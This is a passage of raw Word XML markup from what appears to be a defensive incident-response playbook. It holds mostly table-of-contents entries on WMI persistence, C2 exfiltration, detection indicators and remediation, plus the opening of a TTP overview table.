          </w:rPr>
          <w:t>Detection / IOCs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896696 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="745A2A5D" w14:textId="236337F3"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97" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>A) Host-based IOCs (WMI Persistence Footprint)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896697 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="421836C8" w14:textId="5C2BC39B"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98" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>B) Windows Event Logs (supporting evidence)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896698 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35FA8062" w14:textId="7E3F0E0A"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699" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>C) SIEM / Wazuh (main detection evidence from our demo)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896699 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="661BEE64" w14:textId="353A0375"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700" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remediation Strategies (Containment, Eradication, Recovery)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896700 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58955468" w14:textId="4F7C444B"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701" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Eradication (remove persistence properly)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896701 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73D41110" w14:textId="6878C2BD"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702" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Recovery</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896702 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="299F999C" w14:textId="07A08960" w:rsidR="000603BD" w:rsidRDefault="000603BD">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc220896703" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Security Control / Mitigation Recommendations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896703 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AD4C6D1" w14:textId="317FE7B7"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704" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>References</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896704 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FDC3543" w14:textId="14AEC424" w:rsidR="000603BD" w:rsidRDefault="000603BD">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc220896705" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Incident #004 – Exfiltration Over C2 Channel</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896705 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DF43690" w14:textId="200E36D0"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706" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896706 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5CDE0974" w14:textId="71B6E7F0"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707" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Attack Documentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896707 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D1D8A7F" w14:textId="692EF9A9"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708" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detection / IOCs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896708 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0156FE6F" w14:textId="31D395DE"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709" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remediation Strategies</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896709 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="016BA911" w14:textId="533047AD"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710" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Security Control/Mitigation Recommendations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896710 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A41A242" w14:textId="27FC7E39" w:rsidR="000603BD" w:rsidRDefault="000603BD">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc220896711" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>References</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896711 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="567ACF1F" w14:textId="62FA7BFA" w:rsidR="1C075EAA" w:rsidRDefault="1C075EAA" w:rsidP="1C075EAA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9180"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="553E02A5" w14:textId="4C068ACF" w:rsidR="004D5913" w:rsidRPr="004D5913" w:rsidRDefault="00CB4373" w:rsidP="004D5913">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:ind w:left="-709"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="2"/>
      <w:commentRangeEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="2"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F85EB7" w14:textId="77777777" w:rsidR="004D5913" w:rsidRPr="004D5913" w:rsidRDefault="004D5913" w:rsidP="004D5913">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:ind w:left="-709"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:kern w:val="28"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4156661A" w14:textId="77777777" w:rsidR="00E71233" w:rsidRDefault="00E749F5" w:rsidP="00E749F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc220896677"/>
      <w:bookmarkStart w:id="4" w:name="_Toc36764272"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Playbook TTP Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="2A97C232" w14:textId="77777777" w:rsidR="00FF756D" w:rsidRDefault="00E71233" w:rsidP="00705FA1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This document provides an overview of the tools, tactics and techniques demonstrated in recent cybersecurity incidents that have occurred within the organisation, along with the various detection, mitigation/remediation and recommended security controls to further strengthen the organisation’s security posture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01CE56" w14:textId="77777777" w:rsidR="00FF756D" w:rsidRDefault="00FF756D" w:rsidP="00E71233">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="2410"/>
        <w:gridCol w:w="3939"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FF3308" w14:paraId="7C25EF81" w14:textId="77777777" w:rsidTr="00B64716">
        <w:trPr>
          <w:trHeight w:val="912"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F556860" w14:textId="77777777" w:rsidR="00FF3308" w:rsidRPr="004C02FF" w:rsidRDefault="00FF3308" w:rsidP="00EC5A44">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Incident Number &amp; Title Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A91E803" w14:textId="77777777" w:rsidR="00FF3308" w:rsidRPr="004C02FF" w:rsidRDefault="00FF3308" w:rsidP="00EC5A44">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Tactic Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
